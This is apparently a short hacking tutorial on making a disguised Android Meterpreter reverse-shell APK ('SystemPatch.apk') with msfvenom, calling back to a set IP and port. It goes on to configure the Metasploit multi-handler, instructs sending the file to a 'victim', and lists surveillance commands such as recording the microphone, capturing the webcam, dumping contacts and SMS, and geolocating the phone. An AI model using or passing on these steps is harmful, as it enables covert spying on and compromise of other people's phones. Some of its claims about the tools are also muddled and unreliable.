Msfvenom is a Kali Linux hacking tool for Android. It is a combination of Msfpayload and Msfencode, putting both of these tools into a single framework instance known as the msfvenom payload.
Hacking with Metasploit in Kali Linux is an old technique. In Kali Linux, Metasploit is enhanced by msfvenom. Metasploit is now an outdated tool. So, let's get started!
STEPS :
- Fire up Kali and open a command terminal.
- Set the payload and create a custom Android APK file. Command:
root@Short-wiz:~# msfvenom -p android/meterpreter/reverse_tcp LHOST=74.18.0.45 LPORT=4443 R > SystemPatch.apk
To find your LHOST (LHOST is your machine's IP address), open a new terminal and type ifconfig:
1. eth0: for Ethernet connections with data cables.
2. wlan0: for WiFi connections (recommended if you are on the same WiFi as your future victim).
Your APK file has been saved in the Home folder as SystemPatch.apk.
Note: Don’t add any stray space characters anywhere. Use the command as is (after changing the LHOST and LPORT as needed).
- Start the Metasploit framework console as follows. Command:
root@Short-wiz:~# msfconsole
- Now it's time to open and set up the multi-handler. Follow these steps:
- msf > use multi/handler
- msf exploit(handler) > set payload android/meterpreter/reverse_tcp
- msf exploit(handler) > set LHOST 74.18.0.45
- msf exploit(handler) > set LPORT 4443
- msf exploit(handler) > exploit
Payload Handler is being started……..
- Transfer/mail this file (here SystemPatch.apk) to the victim's phone and install it.
- When the victim clicks on the app (installed as MAIN ACTIVITY in the menu) on his phone, a meterpreter session will be established.
- Try the following exploit commands:
- record_mic
- webcam_snap
- webcam_stream
- dump_contacts
- dump_sms
- geolocate
************************************************************************
Error fixing (in case you get PARSE ERROR)
Two methods:
1) Type the command "d2j-apk-sign SystemPatch.apk"
or
2) Download signapk to fix this error.
Steps to follow
- Open the Signapk folder, then open cmd.
- Copy SystemPatch.apk (the app you made) into the Signapk folder.
- Type "java -jar signapk.jar certificate.pem key.pk8 SystemPatch.apk SystemPatch-signed.apk" in cmd (without the double quotes).
- Copy it to your phone and install it.
Hope this works for you too… 🙂